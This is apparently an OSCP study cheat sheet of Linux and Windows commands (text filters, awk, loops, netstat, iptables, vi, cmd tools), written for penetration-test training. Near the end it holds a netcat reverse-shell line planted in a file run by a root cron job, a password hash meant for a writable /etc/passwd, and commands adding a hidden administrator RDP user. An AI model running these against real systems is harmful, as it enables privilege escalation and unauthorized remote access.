Linux / Windows Main commands

Linux main commands in OSCP
Find:
# Find a file by name anywhere on the system. 2>/dev/null sends the
# "Permission denied" errors (stderr) to /dev/null so they do not flood the output.
find / -name file 2>/dev/null
# Long listing sorted by modification time, oldest first (-l long, -t by mtime, -r reverse).
ls -ltr
# Remove a directory and everything inside it, recursively and without asking. Very dangerous command!
rm -rf ./directory
# List which commands the current user may run with sudo, and as which user.
sudo -l
Which
Outputs the path of the binary that would run for a given command name. It searches the directories listed in your $PATH variable, in order.
which bash
# Usually outputs: /bin/bash
Filters
#sort - sort lines
sort test.txt
#uniq - drop adjacent duplicate lines (the input must be sorted first; sort -u does both steps)
sort -u test.txt
sort test.txt | uniq
cat filename | sort -u > newFileName
grep - print lines matching a pattern
head - first lines of the input (10 by default)
tail - last lines of the input
tr - translate or delete characters
sed - stream editor
# Delete the first line
sed "1d"
#cut : split each line on a delimiter and keep selected fields. Given this ping output line
64 bytes from 192.168.0.1: icmp_req=1 ttl=255 time=4.86 ms
# the following keeps the fourth space-separated field, "192.168.0.1:"
cut -d" " -f4
-d stands for delimiter and -f for field.
tr - Translate
Transform all letters into capital letters:
tr "[:lower:]" "[:upper:]" < file1 > file2
Remove characters
# Remove all dots (-d deletes every character in the set)
cat file.txt | tr -d "."
# Replace all dots with underscores
cat file.txt | tr "." "_"
awk
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse
# Print every line matching the pattern (an unescaped dot in a regex matches any character, not only a literal dot)
awk '/172.16.40.10.81/' error.log
# Print every line (print with no argument prints the whole line)
awk '{print}' filename
We can use the -F flag to set a custom field delimiter, for example the first field of each line in a colon-separated file: awk -F ':' '{print $1}' test.txt
If you are manipulating some text you might want to start the output with a header describing the columns. For that there is the BEGIN block, which runs once before the first line is read; the END block runs once after the last line.
awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3}' test.txt | head
awk 'BEGIN{printf "IP-address \tPort\n"} /nop/ {print $3} END {printf "End of the file\n"}' test.txt | tail
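The filters above (sort, uniq, cut, awk with field conditions and BEGIN/END) combined into one small log-triage pipeline, as an added example that is not part of the original notes. The access-log lines are constructed here; the field numbers ($1 client IP, $7 request path, $9 HTTP status) assume the usual combined access-log layout, which is an assumption of this example:

```shell
#!/bin/bash
# Added example: triage a web-server access log with the filters from the notes.
# LOG_SAMPLE is constructed sample data, not a real log. Field numbers assume
# the combined log layout: $1 client IP, $7 request path, $9 HTTP status.
LOG_SAMPLE='10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /login HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "POST /login HTTP/1.1" 401 128
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "POST /login HTTP/1.1" 401 128
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "POST /login HTTP/1.1" 401 128
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "POST /login HTTP/1.1" 200 512'

# "count ip" per client, busiest first: awk picks the field, sort groups
# identical lines so that uniq -c can count them, sort -rn orders by the count.
hits_per_ip() {
    printf '%s\n' "$LOG_SAMPLE" | awk '{print $1}' | sort | uniq -c | sort -rn
}

# Distinct request paths, using cut on the space delimiter instead of awk.
request_paths() {
    printf '%s\n' "$LOG_SAMPLE" | cut -d' ' -f7 | sort -u
}

# Clients that got a 401 on /login: an awk condition on fields instead of a
# regex pattern, then sort -u to deduplicate.
failed_login_ips() {
    printf '%s\n' "$LOG_SAMPLE" | awk '$9 == 401 && $7 == "/login" {print $1}' | sort -u
}

# The single IP with the most failed logins: head keeps the top line and the
# final awk strips the count column that uniq -c added.
top_bruteforcer() {
    printf '%s\n' "$LOG_SAMPLE" | awk '$9 == 401 {print $1}' \
        | sort | uniq -c | sort -rn | head -n 1 | awk '{print $2}'
}

# BEGIN/END as in the notes: a header, the matching lines, then a footer
# using NR (the number of records read so far).
report() {
    printf '%s\n' "$LOG_SAMPLE" | awk 'BEGIN {printf "IP\tStatus\tPath\n"}
        $9 == 401 {printf "%s\t%s\t%s\n", $1, $9, $7}
        END {printf "%d lines scanned\n", NR}'
}

hits_per_ip
echo "top brute-forcer: $(top_bruteforcer)"
report
```

On a real log, replace the printf of LOG_SAMPLE with cat of the log file; the rest of each pipeline stays the same.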
# List the current user's cronjobs
crontab -l
# Edit or create cronjobs
crontab -e
#List all disks and partitions
fdisk -l
#Systemctl - start, inspect and stop services
systemctl start ssh
systemctl status ssh
systemctl stop ssh
Netstat - Find outgoing and incoming connections
Netstat is a multiplatform tool, available on macOS, Windows and Linux; the flags below are the Linux ones.
# -a all sockets, -n numeric addresses (no DNS lookups), -t TCP only, -l listening sockets,
# -p the owning process (you need root to see processes of other users)
netstat -antlp
netstat -anpt
# List firewall rules
iptables -L
# Remove one specific rule: rule number 2 in the INPUT chain (iptables -L --line-numbers shows the numbers)
iptables -D INPUT 2

Iteration over a file

This script will iterate over a file and echo out every single line. Note that the for-loop actually splits on whitespace, not on newlines, so a line that contains spaces is printed as several lines, and words such as * are expanded as globs:
#!/bin/bash
for line in $(cat file.txt);do
echo $line
done

Another way, which really does read one line at a time (IFS= keeps leading and trailing blanks, -r keeps backslashes literal):

#!/bin/bash
while IFS= read -r p; do
echo "$p"
done <file.txt
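The difference between the two loops above, shown on a constructed three-line file, as an added example that is not part of the original notes. The sample file content is made up here; the point is that the for/cat loop counts whitespace-separated words while the while/read loop counts lines and keeps them intact:

```shell
#!/bin/bash
# Added example: why `for line in $(cat file)` is not a line loop.
# The sample file is constructed; it has three lines, two containing spaces
# and one starting with blanks.
make_sample() {
    printf '%s\n' 'alice:x:1000:1000:Alice A.:/home/alice:/bin/bash' \
                  'backup user' \
                  '   indented line' > "$1"
}

# Naive loop: the unquoted $(cat ...) is word-split on IFS (space, tab,
# newline), so this counts words, not lines. Globs like * would also expand.
count_for_cat() {
    local n=0
    for line in $(cat "$1"); do
        n=$((n + 1))
    done
    echo "$n"
}

# Correct loop: read consumes exactly one line per iteration, IFS= keeps
# leading/trailing blanks and -r stops backslash processing.
count_while_read() {
    local n=0
    while IFS= read -r line; do
        n=$((n + 1))
    done < "$1"
    echo "$n"
}

# Return the N-th line verbatim, including its leading blanks.
nth_line() {
    local n=0
    while IFS= read -r line; do
        n=$((n + 1))
        if [ "$n" -eq "$2" ]; then
            printf '%s\n' "$line"
            return 0
        fi
    done < "$1"
    return 1
}

tmp=$(mktemp)
make_sample "$tmp"
echo "for/cat   : $(count_for_cat "$tmp") iterations"    # 6: words, not lines
echo "while/read: $(count_while_read "$tmp") iterations" # 3: one per line
echo "third line: '$(nth_line "$tmp" 3)'"
rm -f "$tmp"
```

The practical consequence: a /etc/passwd line with a space in the GECOS field, or a filename with a space, is silently split by the for/cat form, so use while/read whenever the lines are data you act on.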

For Loops

#!/bin/bash
for ((i = 0; i < 10; i++)); do
echo $i
done
Another way to write this is with the program seq. seq is pretty much like range() in python, so it can be used like this:
#!/bin/bash
for x in `seq 1 100`; do
echo $x
done
Command substitution: the last path that locate finds for 646.c is printed by
#!/bin/bash
locate 646.c | tail -n 1
and that output can be fed straight into another command, like this:
#!/bin/bash
cat $(locate 646.c | tail -n 1)

VI Operators

Operators are commands that do things, like delete, change or copy.
c - change
ce - change until the end of the word.
c$ - change until the end of the line.
Combining Motions and Operators
Now that you know some motion commands and operator commands, you can start combining them.
dw - delete word
d$ - delete to the end of the line

Password Creation

Generate a crypt(3)-style hash of the password "sam", for example to add a user line to a writable /etc/passwd. Without options older OpenSSL versions emit the weak traditional DES-crypt format; the -1 option selects MD5-crypt and -6 (OpenSSL 1.1.1 and later) SHA-512-crypt.
openssl passwd sam

Windows Commands

cmd:
Show hidden files:
dir /A
Print out file content, like cat:
type file.txt
Search files for a string, like grep (findstr needs the pattern before the file name):
findstr "pattern" file.txt
Show network connections and listening ports:
netstat -an
Show network adapter info:
ipconfig
Traceroute:
tracert
List processes:
tasklist
Kill a process:
taskkill /PID 1532 /F
Overwrite the free (deallocated) space on a volume so that previously deleted files cannot be recovered. It does not touch existing files, so it does not shred the whole machine:
cipher /w:C:\
Mounting - Mapping: list the logical drives
wmic logicaldisk get deviceid, volumename, description

Scripts for fun

Make a request (Python 3):
import requests

req = requests.get("http://site.com")
print(req.status_code)
print(req.text)
Read a file line by line:
with open("readme.txt", "r") as file_open:
    for line in file_open:
        line = line.strip("\n")
        print(line)
        if line == "rad 4":
            print("last line")
Write a Python reverse shell into a file, for example a script that a root cron job executes; replace ip and port with your listener. Note that the -e option is not supported by every netcat build:
echo 'import os; os.system("/bin/nc ip port -e /bin/bash")' > /opt/tmp.py

Add RDP User

Windows: create a local user, make it a local administrator and allow it to log in over RDP.
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add

Enable RDP via Registry

Enable RDP via registry